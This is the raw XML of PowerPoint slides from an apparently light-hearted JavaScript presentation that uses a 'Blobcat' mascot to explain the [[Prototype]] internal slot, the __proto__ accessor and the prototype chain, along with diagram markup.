          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en"/>
              <a:pPr lvl="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="52834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An empty object</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It is said that everything in this universe is made of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0" err="1"/>
              <a:t>Blobcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Node.js is too bad at finding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0" err="1"/>
              <a:t>Blobcat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pP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highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</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highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highligh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highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> more information.</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&gt; {}</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{}</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>The browser is much better at finding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0" err="1"/>
              <a:t>Blobcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> (the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9B8D8F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[[Prototype]]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
              <a:t>“who *screeches* awe you?!?! What </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0" err="1"/>
              <a:t>bwings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
              <a:t> you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0" err="1"/>
              <a:t>hewe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
              <a:t>!? (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-HK" altLang="en-US" i="1" dirty="0"/>
              <a:t>・</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
              <a:t>`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="zh-HK" i="1" dirty="0"/>
              <a:t>ω´</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-HK" altLang="el-GR" i="1" dirty="0"/>
              <a:t>・</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="zh-HK" i="1" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
              <a:t>”</a:t>
            </a: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6" name="Picture 15" descr="Almost invisible ghost blobcat">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{655A48CD-84DB-17FD-6278-5DEEA59B719E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1910668" y="2045279"/>
            <a:ext cx="1219200" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6" descr="A JavaScript object showing its prototype">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D256D94-4784-DA36-A4EB-BA0EEE0CEEED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="948407" y="3362876"/>
            <a:ext cx="2745808" cy="851314"/>
            <a:chOff x="948407" y="3362876"/>
            <a:chExt cx="2745808" cy="851314"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="18" name="Picture 17" descr="A close up of a screen showing the prototype of an empty object">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DADF9A1D-258F-5B72-2EC4-B140E7705406}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="948407" y="3424070"/>
              <a:ext cx="2745808" cy="790120"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 5" descr="A cat with a black background&#10;&#10;Description automatically generated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7767F805-D12C-C042-889F-370FAA798E9C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2876908" y="3362876"/>
              <a:ext cx="817307" cy="817307"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3964324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Prototype [1]</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“Why are you in my empty object?!?”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Every object has a property called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9B8D8F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[[Prototype]]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>, which is internal and not accessible directly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>For those in the know: No, it is not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" i="1" dirty="0"/>
              <a:t>stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> under the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__proto__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> property. The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__proto__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> property is a pair of getter and setter. This will be explained later.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>(The proper term to describe </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r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> is not actually “property” but “internal slot”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Value of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9B8D8F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[[Prototype]]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> must be either another object (no cycles allowed) or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>null	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>The object in </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r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> itself also have a </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r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>, and this continues on indefinitely, making a chain called the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" i="1" dirty="0"/>
              <a:t>prototype chain</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>The prototype chain ends when next </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r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> value is </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-HK" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK"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https://developer.mozilla.org/docs/Web/JavaScript/Inheritance_and_the_prototype_chain</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="94" name="Group 93" descr="A JavaScript prototype chain example">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AF08017-09B9-BFDC-9CEA-B92E97FD609C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="291604" y="3389176"/>
            <a:ext cx="8426062" cy="1459595"/>
            <a:chOff x="291604" y="3389176"/>
            <a:chExt cx="8426062" cy="1459595"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="18" name="Connector: Curved 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66CF9B5A-3B31-7B2A-9B13-D66A75406851}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="43" idx="3"/>
              <a:endCxn id="49" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2142780" y="3645531"/>
              <a:ext cx="384979" cy="631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D3C591B1-D76E-2BE8-D8AD-B1D78BD5F6D1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="50" idx="3"/>
              <a:endCxn id="52" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4383132" y="3734025"/>
              <a:ext cx="290426" cy="881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2536C43B-69B1-1D3E-E890-8A4B53440AFA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="53" idx="3"/>
              <a:endCxn id="55" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6517304" y="3613246"/>
              <a:ext cx="344218" cy="5447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084A78C9-3A50-5169-268A-5D3A1DD09DD9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="56" idx="3"/>
              <a:endCxn id="58" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="346891" y="3792731"/>
              <a:ext cx="8365962" cy="772869"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector5">
              <a:avLst>
                <a:gd name="adj1" fmla="val -2733"/>
                <a:gd name="adj2" fmla="val 52415"/>
                <a:gd name="adj3" fmla="val 1027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AB710F7-2AF9-A272-B9C6-80A15F8CCB6C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="59" idx="3"/>
              <a:endCxn id="61" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2198067" y="4438331"/>
              <a:ext cx="527486" cy="28526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8228FCA2-211C-10A4-2335-8E426B36D691}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="62" idx="3"/>
              <a:endCxn id="16" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4564776" y="4478025"/>
              <a:ext cx="696325" cy="935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329C48C-D9C3-3DDF-D72F-A3C157778A06}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7368469" y="4303593"/>
              <a:ext cx="914400"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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="40" name="Connector: Curved 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B267F5EE-01FF-A716-53FD-B95A064C8BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="90" idx="3"/>
              <a:endCxn id="29" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6560515" y="4411819"/>
              <a:ext cx="807954" cy="4566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C4CF26FA-C3EA-D7A5-532B-FDEC99AFA9D0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="291604" y="3389176"/>
              <a:ext cx="1851176" cy="567874"/>
              <a:chOff x="388156" y="3369336"/>
              <a:chExt cx="1851176" cy="567874"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="8" name="Picture 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{200CCC15-834D-53B7-1EBB-20C5265B41E7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="388156" y="3568709"/>
                <a:ext cx="1851176" cy="368501"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="43" name="Picture 42" descr="A cat with a black background&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E45BE84-079B-642B-BF07-0010CD7D5F56}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="1726623" y="3369336"/>
                <a:ext cx="512709" cy="512709"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="48" name="Group 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B17E928F-3A8E-A453-1FD1-534AB4D223F3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="282899">
              <a:off x="2532821" y="3401494"/>
              <a:ext cx="1851176" cy="567874"/>
              <a:chOff x="388156" y="3369336"/>
              <a:chExt cx="1851176" cy="567874"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="49" name="Picture 48">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BEAB3DB-6E53-E9CD-C8F0-DF116589E163}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="388156" y="3568709"/>
                <a:ext cx="1851176" cy="368501"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="50" name="Picture 49" descr="A cat with a black background&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{913B6EE7-C0B3-971A-CB6B-ACE8C5BB5A78}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="1726623" y="3369336"/>
                <a:ext cx="512709" cy="512709"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="51" name="Group 50">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B35861D-34AA-F25B-8FF6-BBF2ED6AF08A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="21448080">
              <a:off x="4668250" y="3397754"/>
              <a:ext cx="1851176" cy="567875"/>
              <a:chOff x="388156" y="3369336"/>
              <a:chExt cx="1851176" cy="567875"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="52" name="Picture 51">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1D87B1B-1B3B-DBB2-6614-3ACDED5ECFCB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="388156" y="3568710"/>
                <a:ext cx="1851176" cy="368501"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="53" name="Picture 52" descr="A cat with a black background&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D6EA5D7-ADAE-5B39-7A9A-468B9ABE15A7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="1726623" y="3369336"/>
                <a:ext cx="512709" cy="512709"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="54" name="Group 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DA4EE99-665E-8403-83F3-9186126E271D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
